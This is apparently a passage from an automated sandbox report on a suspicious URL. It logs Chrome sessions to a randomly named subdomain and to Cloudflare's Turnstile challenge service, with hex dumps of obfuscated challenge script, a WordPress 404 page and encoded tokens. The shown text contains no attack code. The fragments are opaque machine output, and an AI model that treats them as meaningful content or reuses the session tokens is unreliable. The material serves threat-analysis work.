                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 68 62 3d 67 4a 2c 7b 27 79 79 7a 45 73 27 3a 66 75 6e 63 74 69 6f 6e 28 47 29 7b 72 65 74 75 72 6e 20 47 28 29 7d 2c 27 75 74 73 65 52 27 3a 68 62 28 37 38 38 29 2c 27 4a 43 62 44 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 56 77 58 7a 75 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 47 56 4c 42 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 68 51 55 54 6a 27 3a 68 62 28 37 36 32 29 2c 27 47 58 42 49 5a 27 3a 68 62 28 31 33 35 33 29 2c 27 45 65 5a 6d 6b 27 3a 68 62 28 38 35 33 29 2c 27 77 6e 75 63 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65
                                                                                        Data Ascii: ,m,n,o,s,x,B,C,D,E,F){i=(hb=gJ,{'yyzEs':function(G){return G()},'utseR':hb(788),'JCbDK':function(G,H){return G+H},'VwXzu':function(G,H){return G+H},'GVLBE':function(G,H){return G+H},'hQUTj':hb(762),'GXBIZ':hb(1353),'EeZmk':hb(853),'wnucm':function(G,H){re
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 28 65 5a 2c 66 5b 68 62 28 36 31 37 29 5d 2c 66 5b 68 62 28 33 39 30 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 78 5b 68 62 28 34 38 39 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 44 3d 28 43 3d 7b 7d 2c 43 5b 68 62 28 31 32 30 30 29 5d 3d 66 2c 43 5b 68 62 28 31 34 31 34 29 5d 3d 42 2c 43 2e 63 63 3d 67 2c 43 5b 68 62 28 35 33 38 29 5d 3d 73 2c 43 5b 68 62 28 39 39 37 29 5d 3d 46 2c 4a 53 4f 4e 5b 68 62 28 37 37 36 29 5d 28 43 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 46 3d 28 45 3d 7b 7d 2c 45 5b 68 62 28 35 37 31 29 5d 3d 65 4d 5b 68 62 28 36 34 32 29 5d 5b 68 62 28 35 37 31 29 5d 2c 45 5b 68 62 28 38 38 36 29 5d 3d 65 4d 5b 68 62 28 36 34 32 29 5d 5b 68 62 28 38 38 36 29 5d 2c
                                                                                        Data Ascii: (eZ,f[hb(617)],f[hb(390)]);continue;case'13':x[hb(489)]=5e3;continue;case'14':D=(C={},C[hb(1200)]=f,C[hb(1414)]=B,C.cc=g,C[hb(538)]=s,C[hb(997)]=F,JSON[hb(776)](C));continue;case'15':F=(E={},E[hb(571)]=eM[hb(642)][hb(571)],E[hb(886)]=eM[hb(642)][hb(886)],


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.449767192.185.57.264434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:53 UTC612OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: 5m9sp7.naomijewelryjapan.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:54 UTC263INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 08:17:54 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Last-Modified: Fri, 30 Sep 2022 16:21:28 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 11816
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Type: text/html
                                                                                        2024-12-24 08:17:54 UTC7929INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Typ
                                                                                        2024-12-24 08:17:54 UTC3887INData Raw: 69 74 65 43 6f 6e 64 20 25 7b 52 45 51 55 45 53 54 5f 46 49 4c 45 4e 41 4d 45 7d 20 21 2d 64 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 2e 20 2f 69 6e 64 65 78 2e 70 68 70 20 5b 4c 5d 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 26 6c 74 3b 2f 49 66 4d 6f 64 75 6c 65 26 67 74 3b 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 23 20 45 6e 64 20 57 6f 72 64 50 72 65 73 73 0a 09 09 09 09 09 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 72 20 62 6c 6f 67 20 69 73 20 73 68 6f 77 69 6e 67 20 74 68 65 20 77 72 6f 6e 67 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 6e 20 6c 69 6e 6b 73 2c 20 72 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 61 6e 6f 74 68 65
                                                                                        Data Ascii: iteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br>&lt;/IfModule&gt;<br># End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to anothe


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.449768104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:53 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3243
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:53 UTC3243OUTData Raw: 76 5f 38 66 36 66 32 38 33 66 61 62 38 30 63 34 36 31 3d 4f 6c 30 7a 75 7a 76 7a 73 7a 46 7a 52 7a 43 49 32 37 49 32 54 72 48 54 48 4b 41 34 48 41 32 48 72 6f 4b 5a 48 73 6f 32 68 49 32 6f 5a 57 32 56 6e 7a 5a 58 6a 54 6e 58 75 33 6c 48 4d 32 69 72 76 5a 32 24 76 7a 32 50 36 32 41 74 39 32 34 42 72 32 4b 30 33 7a 68 6e 32 39 7a 76 75 42 32 52 49 58 76 6f 32 44 70 43 6e 32 4d 75 57 49 63 33 67 43 50 38 79 32 70 54 73 73 31 65 48 32 7a 68 72 4e 48 53 75 32 41 6f 32 67 7a 32 75 76 56 67 46 4c 46 6a 58 32 51 6f 30 32 44 4f 7a 6a 59 48 68 43 49 69 4a 76 67 52 77 6a 69 6f 76 49 33 32 76 50 76 56 36 58 32 6a 77 54 64 68 6a 30 6f 32 48 6f 32 56 6e 54 57 52 58 48 63 74 72 32 59 50 45 6a 74 32 6f 61 6a 71 33 7a 79 32 68 5a 32 6a 72 61 6a 6f 44 34 4b 32 47 50 32 41
                                                                                        Data Ascii: v_8f6f283fab80c461=Ol0zuzvzszFzRzCI27I2TrHTHKA4HA2HroKZHso2hI2oZW2VnzZXjTnXu3lHM2irvZ2$vz2P62At924Br2K03zhn29zvuB2RIXvo2DpCn2MuWIc3gCP8y2pTss1eH2zhrNHSu2Ao2gz2uvVgFLFjX2Qo02DOzjYHhCIiJvgRwjiovI32vPvV6X2jwTdhj0o2Ho2VnTWRXHctr2YPEjt2oajq3zy2hZ2jrajoD4K2GP2A
                                                                                        2024-12-24 08:17:54 UTC747INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:54 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 149708
                                                                                        Connection: close
                                                                                        cf-chl-gen: GSen5/yB1YpQl6yIIOWJstpgrhDkQRGV1JI/KzGCLanoxz3UT3cnz/3l0n8LzHjFZQgi9jm/JwskqfLwE1DNWBr3LcG5y0upyyhcF7U7ei5YcLe8WaiCo6uND1L+R+wkdjvdwfl0nwhPXTAaeJ88/WQm/n4r/PVwyxz/9I0nT8pSZELq/VwQ5k2tkKOy955OP/QmkISdfODloAnAOtTnddHzjkeWhbUlZZX5Yd6tghiQui7XHrmhXiaZWZCP/YDY672l87EP8stZCmxKka+mAj/lmW/KUR04e8KLl2WlmhLw64cd9gQhetQn2wzOZ2J7lDkx/hZO0/jpGxqqD8OXoNILJQnqDoiUx5ajj/B6vGz9bpq/Y4O9snpABTzoLxEj8ZURt7qrWJhIj/lvDgjO4BtbkFAehTTzctmcNnBDdhWOCY74vLb1GuINKOZqp7x8/dQdCmNgQd+iR6/h02S+/45tW8xK9dL0Mq796UeZEYwPCms=$5ZcQLQFfvcEAzg7c
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f285908a94394-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:54 UTC622INData Raw: 64 62 79 77 6e 71 47 53 70 63 53 77 67 59 58 49 70 38 53 39 79 6f 6a 4b 6d 36 37 53 6b 37 33 42 79 36 47 68 30 72 4f 71 32 4d 57 2f 6d 4d 79 30 76 4b 4c 51 34 63 62 64 31 38 58 47 75 62 69 71 33 4f 33 59 33 36 2f 64 76 4d 4c 45 7a 37 50 70 31 65 53 34 32 66 50 77 38 72 37 5a 33 75 47 38 78 64 7a 32 42 2f 6e 6f 31 65 66 74 37 4f 6e 38 37 39 38 41 37 66 59 58 37 76 6e 59 46 52 59 63 37 65 67 4f 49 50 48 74 41 52 58 6c 38 66 44 2b 39 41 67 6a 4a 75 67 4a 43 42 77 30 38 68 34 66 36 43 30 75 42 42 63 4e 4c 41 67 57 4d 66 64 43 47 6a 56 41 45 6a 51 77 50 68 35 4c 41 68 59 39 55 45 35 46 43 45 6b 52 49 69 56 46 4e 46 6f 58 54 54 49 57 47 79 78 67 4d 55 38 79 4c 52 78 57 4a 46 68 4a 58 54 55 6a 59 55 56 46 53 53 78 52 4c 57 46 4d 52 32 68 52 52 30 56 7a 4f 48 49
                                                                                        Data Ascii: dbywnqGSpcSwgYXIp8S9yojKm67Sk73By6Gh0rOq2MW/mMy0vKLQ4cbd18XGubiq3O3Y36/dvMLEz7Pp1eS42fPw8r7Z3uG8xdz2B/no1eft7On8798A7fYX7vnYFRYc7egOIPHtARXl8fD+9AgjJugJCBw08h4f6C0uBBcNLAgWMfdCGjVAEjQwPh5LAhY9UE5FCEkRIiVFNFoXTTIWGyxgMU8yLRxWJFhJXTUjYUVFSSxRLWFMR2hRR0VzOHI
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 78 62 6b 49 4a 78 61 49 47 53 64 5a 61 4f 56 6d 68 73 6a 58 46 33 58 4a 75 45 6d 6d 2b 56 5a 6e 2b 70 70 57 79 4d 68 48 78 74 6a 35 35 74 64 62 57 69 67 48 47 52 69 70 47 32 64 6e 36 5a 65 70 61 51 72 73 47 54 6e 5a 32 41 74 37 6d 68 71 4c 71 42 70 38 72 42 6b 73 44 55 72 62 58 4e 6f 39 6a 63 73 39 58 4e 30 74 6a 63 74 4e 32 66 33 5a 69 6c 73 65 4c 6a 78 65 76 6b 71 73 75 2b 38 63 58 43 36 39 43 76 38 62 48 4e 36 4e 54 46 74 39 44 6e 34 63 44 33 74 63 7a 52 38 41 50 62 41 75 50 44 79 4f 41 47 41 51 49 44 38 39 76 6d 38 4f 72 74 31 67 54 31 31 2f 30 57 36 77 7a 5a 49 2f 54 35 46 53 54 31 46 41 66 6e 38 67 4c 32 35 2b 34 63 36 54 4c 72 43 69 58 72 4f 43 51 58 39 6a 55 53 42 2f 63 32 4c 50 6c 43 4e 78 6f 31 2b 7a 67 30 4a 77 63 31 49 68 63 49 4c 77 63 74 45
                                                                                        Data Ascii: xbkIJxaIGSdZaOVmhsjXF3XJuEmm+VZn+ppWyMhHxtj55tdbWigHGRipG2dn6ZepaQrsGTnZ2At7mhqLqBp8rBksDUrbXNo9jcs9XN0tjctN2f3ZilseLjxevkqsu+8cXC69Cv8bHN6NTFt9Dn4cD3tczR8APbAuPDyOAGAQID89vm8Ort1gT11/0W6wzZI/T5FST1FAfn8gL25+4c6TLrCiXrOCQX9jUSB/c2LPlCNxo1+zg0Jwc1IhcILwctE
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 57 57 48 43 59 66 59 35 2f 64 6d 2b 65 62 33 4b 44 6d 58 65 46 6b 33 4b 64 6d 49 57 71 70 58 43 5a 67 33 39 74 6a 32 2b 48 71 36 57 36 74 35 32 70 6b 70 57 4b 65 35 37 42 6f 62 71 33 6c 4a 69 6c 75 4a 57 37 78 37 69 65 77 61 57 69 76 63 66 4f 74 4a 65 74 6f 72 4c 50 7a 64 58 5a 34 4a 61 75 6e 72 75 65 32 74 6a 49 32 37 79 7a 76 61 6a 69 6f 4e 79 38 7a 4d 62 41 33 4e 43 76 37 4c 58 59 7a 38 66 30 31 4c 62 36 33 50 72 59 30 62 62 53 34 67 66 6c 35 66 33 64 34 41 77 4a 37 64 2f 77 45 64 45 56 46 76 58 6a 47 67 62 74 37 64 72 75 49 42 73 53 32 77 49 51 41 4f 58 33 42 53 67 67 2b 50 6b 62 49 51 63 41 4b 4f 6b 66 44 78 50 74 4c 68 51 44 43 67 6e 31 37 68 77 56 44 52 41 38 41 51 49 43 51 7a 52 47 43 53 42 42 4a 41 6f 45 4a 6b 67 50 4b 55 55 38 49 31 55 6a 46 56
                                                                                        Data Ascii: WWHCYfY5/dm+eb3KDmXeFk3KdmIWqpXCZg39tj2+Hq6W6t52pkpWKe57Bobq3lJiluJW7x7iewaWivcfOtJetorLPzdXZ4Jaunrue2tjI27yzvajioNy8zMbA3NCv7LXYz8f01Lb63PrY0bbS4gfl5f3d4AwJ7d/wEdEVFvXjGgbt7druIBsS2wIQAOX3BSgg+PkbIQcAKOkfDxPtLhQDCgn17hwVDRA8AQICQzRGCSBBJAoEJkgPKUU8I1UjFV
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 67 59 6c 32 6e 5a 32 54 66 5a 64 2b 65 47 4b 6f 69 34 61 75 61 72 47 6e 65 6e 2b 4f 6a 36 71 7a 72 6f 53 79 75 61 31 32 64 48 79 65 76 4a 75 74 65 71 47 6b 77 33 71 79 76 6f 48 44 68 4d 57 58 78 36 53 45 71 63 4c 55 6b 4a 43 73 79 4d 71 6b 7a 4d 62 54 32 39 4b 76 76 2b 4c 62 32 64 61 79 31 4b 50 41 75 39 2b 6d 76 4b 47 34 34 66 44 73 7a 4f 33 70 77 37 62 54 38 50 53 31 36 64 33 4a 75 63 33 4e 38 2b 7a 54 76 38 48 63 43 74 62 45 2f 76 62 32 37 67 50 5a 36 75 66 74 30 4e 54 4f 35 41 6f 5a 34 78 48 56 2b 4f 30 54 47 51 37 65 44 69 63 65 2f 66 67 56 35 77 59 66 2b 67 34 63 44 53 41 69 4d 67 34 4d 42 43 6e 7a 4f 52 51 54 47 69 77 67 43 44 30 31 2b 78 55 37 50 54 52 45 53 55 41 4b 47 51 68 4a 4f 55 70 42 52 41 6b 66 45 69 51 4e 57 46 55 69 4f 55 59 79 4d 6c 46
                                                                                        Data Ascii: gYl2nZ2TfZd+eGKoi4auarGnen+Oj6qzroSyua12dHyevJuteqGkw3qyvoHDhMWXx6SEqcLUkJCsyMqkzMbT29Kvv+Lb2day1KPAu9+mvKG44fDszO3pw7bT8PS16d3Juc3N8+zTv8HcCtbE/vb27gPZ6uft0NTO5AoZ4xHV+O0TGQ7eDice/fgV5wYf+g4cDSAiMg4MBCnzORQTGiwgCD01+xU7PTRESUAKGQhJOUpBRAkfEiQNWFUiOUYyMlF
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 6e 6d 4a 64 36 47 6f 69 47 56 38 69 48 32 4d 6f 72 4f 4a 6a 71 43 57 71 71 4b 4d 6a 34 32 59 72 58 61 41 73 37 71 41 76 59 4b 78 6d 4c 32 6e 6f 73 4c 47 6a 63 4b 46 77 71 36 77 77 36 48 52 70 61 6e 4a 31 37 58 4c 6c 4e 33 61 73 62 75 65 32 39 6e 4e 6d 37 53 69 73 63 72 6c 30 39 2b 34 35 71 58 41 38 4b 7a 6d 31 4f 48 31 71 61 72 57 30 65 54 5a 36 75 66 50 34 4f 34 45 76 66 41 43 35 76 50 56 43 74 73 48 41 38 50 6f 77 63 62 48 44 51 6a 53 41 42 48 71 7a 75 34 49 45 68 30 4b 45 65 66 53 38 68 77 69 48 51 34 62 4a 65 62 78 48 67 63 44 43 2b 51 76 4c 41 6f 46 37 50 77 69 4d 44 55 77 42 67 7a 31 42 2f 6f 33 50 52 73 34 4d 52 73 33 49 7a 59 37 52 51 42 45 41 77 59 39 42 52 73 51 49 6b 6b 71 4c 41 34 4e 53 6b 46 53 4d 7a 49 77 4f 54 30 66 56 6a 67 67 4d 69 41 59
                                                                                        Data Ascii: nmJd6GoiGV8iH2MorOJjqCWqqKMj42YrXaAs7qAvYKxmL2nosLGjcKFwq6ww6HRpanJ17XLlN3asbue29nNm7Siscrl09+45qXA8Kzm1OH1qarW0eTZ6ufP4O4EvfAC5vPVCtsHA8PowcbHDQjSABHqzu4IEh0KEefS8hwiHQ4bJebxHgcDC+QvLAoF7PwiMDUwBgz1B/o3PRs4MRs3IzY7RQBEAwY9BRsQIkkqLA4NSkFSMzIwOT0fVjggMiAY
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 74 2b 6a 59 4b 6c 62 57 2b 64 6a 6f 47 66 67 4b 65 46 76 49 53 36 71 34 2b 62 76 49 43 31 6f 4c 69 54 70 63 69 36 6e 4b 4f 64 75 36 71 34 71 4b 47 71 30 4b 32 71 7a 4b 7a 55 71 35 65 62 6c 73 61 77 6d 4e 6e 61 76 4a 58 68 30 72 75 36 79 64 79 6e 71 74 62 67 31 38 33 52 35 4e 44 64 31 50 4c 79 73 2f 50 4a 30 2f 50 48 2f 65 62 4b 32 2b 4c 36 33 41 48 52 76 76 37 67 33 76 4d 4c 78 64 63 4c 34 41 66 6f 37 65 7a 47 35 2b 4d 46 43 2b 4c 74 2b 74 49 57 39 77 38 56 49 2b 34 45 49 76 73 48 34 69 62 36 2b 51 55 4b 4b 78 34 77 34 76 34 65 45 2b 73 72 43 41 7a 30 43 68 6b 52 44 6a 6b 4e 4f 30 45 74 44 68 30 64 51 7a 41 79 4e 52 34 5a 4a 77 6f 69 47 7a 6f 63 4b 30 46 46 4d 43 77 6a 4e 79 59 58 56 6a 5a 51 58 7a 73 63 4e 31 4d 72 55 30 4a 41 55 44 64 62 49 55 42 65 52
                                                                                        Data Ascii: t+jYKlbW+djoGfgKeFvIS6q4+bvIC1oLiTpci6nKOdu6q4qKGq0K2qzKzUq5eblsawmNnavJXh0ru6ydynqtbg183R5NDd1PLys/PJ0/PH/ebK2+L63AHRvv7g3vMLxdcL4Afo7ezG5+MFC+Lt+tIW9w8VI+4EIvsH4ib6+QUKKx4w4v4eE+srCAz0ChkRDjkNO0EtDh0dQzAyNR4ZJwoiGzocK0FFMCwjNyYXVjZQXzscN1MrU0JAUDdbIUBeR
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 75 62 34 69 42 6a 61 2b 48 73 36 57 39 70 34 6d 41 66 48 6d 37 6c 33 65 65 6b 5a 32 49 78 38 4f 4b 69 4d 57 66 30 59 6d 67 73 38 76 43 30 70 54 54 6f 74 48 49 79 70 65 71 33 74 76 43 30 4c 33 58 7a 74 43 68 34 73 47 2f 71 64 6a 4c 70 64 44 66 78 2f 4b 39 76 71 7a 6c 31 2f 4f 78 38 38 54 76 74 50 33 77 37 76 44 71 41 64 30 42 41 66 4c 64 41 2b 58 4c 2b 64 66 33 2f 41 62 72 79 4f 48 6b 44 67 30 57 46 4f 62 70 2f 50 51 61 48 2b 73 58 39 41 54 35 41 78 66 35 47 4f 4d 6b 36 53 73 73 4c 54 41 76 4c 67 63 76 4b 53 6b 73 4c 6a 51 50 46 51 34 78 4d 54 38 33 39 52 38 35 4e 50 6b 7a 49 44 59 41 45 77 6c 44 50 68 38 2b 41 53 73 36 51 68 31 47 54 53 35 4c 4c 6c 63 6e 56 44 52 47 57 79 78 65 51 6a 6f 78 54 6a 38 30 49 32 68 54 53 53 63 6d 57 6b 31 65 62 46 77 73 52 44
                                                                                        Data Ascii: ub4iBja+Hs6W9p4mAfHm7l3eekZ2Ix8OKiMWf0Ymgs8vC0pTTotHIypeq3tvC0L3XztCh4sG/qdjLpdDfx/K9vqzl1/Ox88TvtP3w7vDqAd0BAfLdA+XL+df3/AbryOHkDg0WFObp/PQaH+sX9AT5Axf5GOMk6SssLTAvLgcvKSksLjQPFQ4xMT839R85NPkzIDYAEwlDPh8+ASs6Qh1GTS5LLlcnVDRGWyxeQjoxTj80I2hTSScmWk1ebFwsRD
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 68 71 68 32 73 62 2b 6f 6a 49 74 31 72 58 2f 42 68 4c 71 6e 76 59 6d 34 68 6f 62 45 75 4b 79 36 6e 71 66 4a 78 73 44 44 30 4e 61 70 73 71 6d 32 32 62 65 37 34 71 79 35 78 62 4c 6e 76 73 54 63 6f 36 54 42 77 64 37 72 72 73 76 68 35 76 53 77 79 62 50 56 36 72 6e 4b 33 4d 62 78 2f 75 33 79 33 4e 2b 2b 30 66 66 52 77 73 58 6e 77 2b 63 4c 2f 74 72 6a 45 51 51 43 37 41 62 30 30 76 59 55 30 75 55 53 49 50 4c 73 33 64 2f 56 48 2f 41 56 43 66 34 54 2f 41 54 2b 4b 41 72 6f 42 53 51 79 42 78 41 6f 37 67 67 54 4c 68 51 74 48 6a 49 4f 50 43 34 67 2f 50 34 36 4f 6a 67 51 49 44 6f 45 52 69 59 6f 50 43 49 74 43 79 39 48 53 7a 45 73 56 79 6f 79 45 52 52 4f 58 44 6f 66 4c 52 34 76 4c 78 74 48 5a 56 4a 6b 59 54 34 37 61 6d 4a 42 50 30 5a 6b 52 33 52 49 54 6c 39 57 56 46 59
                                                                                        Data Ascii: hqh2sb+ojIt1rX/BhLqnvYm4hobEuKy6nqfJxsDD0Napsqm22be74qy5xbLnvsTco6TBwd7rrsvh5vSwybPV6rnK3Mbx/u3y3N++0ffRwsXnw+cL/trjEQQC7Ab00vYU0uUSIPLs3d/VH/AVCf4T/AT+KAroBSQyBxAo7ggTLhQtHjIOPC4g/P46OjgQIDoERiYoPCItCy9HSzEsVyoyERROXDofLR4vLxtHZVJkYT47amJBP0ZkR3RITl9WVFY
                                                                                        2024-12-24 08:17:54 UTC1369INData Raw: 6f 43 59 76 36 2b 55 70 4a 79 69 71 6f 57 32 6c 36 6e 49 72 36 61 69 7a 4d 44 48 6b 5a 4f 30 6b 63 6e 4a 74 71 69 7a 71 37 32 74 73 4c 4b 35 30 36 61 34 33 65 44 4a 74 38 6d 38 79 2b 48 71 79 73 2b 2f 71 2f 4c 56 36 63 75 31 32 63 66 59 7a 4e 76 78 2f 65 37 39 75 73 54 2b 41 77 44 6b 32 75 6a 46 32 65 6e 6f 2f 63 72 62 7a 77 77 4c 30 68 45 4f 36 51 38 4d 48 50 6a 2b 36 67 44 32 39 50 4c 67 38 53 55 54 41 41 6e 70 4b 42 38 75 43 43 33 35 37 43 67 43 43 42 4d 66 37 41 67 71 41 7a 4c 78 4c 50 73 70 46 43 73 7a 4e 77 77 38 46 44 38 36 50 51 49 6e 41 68 77 6b 47 53 5a 43 4b 68 78 4a 48 6b 63 57 4a 42 68 4e 57 69 56 47 4c 6a 39 4d 54 6a 41 30 50 30 4e 41 55 31 31 49 4f 56 68 57 56 31 68 51 53 6b 64 76 4c 53 74 6d 61 6d 68 57 65 47 31 76 56 56 4e 4b 65 6e 42 54
                                                                                        Data Ascii: oCYv6+UpJyiqoW2l6nIr6aizMDHkZO0kcnJtqizq72tsLK506a43eDJt8m8y+Hqys+/q/LV6cu12cfYzNvx/e79usT+AwDk2ujF2eno/crbzwwL0hEO6Q8MHPj+6gD29PLg8SUTAAnpKB8uCC357CgCCBMf7AgqAzLxLPspFCszNww8FD86PQInAhwkGSZCKhxJHkcWJBhNWiVGLj9MTjA0P0NAU11IOVhWV1hQSkdvLStmamhWeG1vVVNKenBT


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.449770104.18.95.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:56 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 08:17:56 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
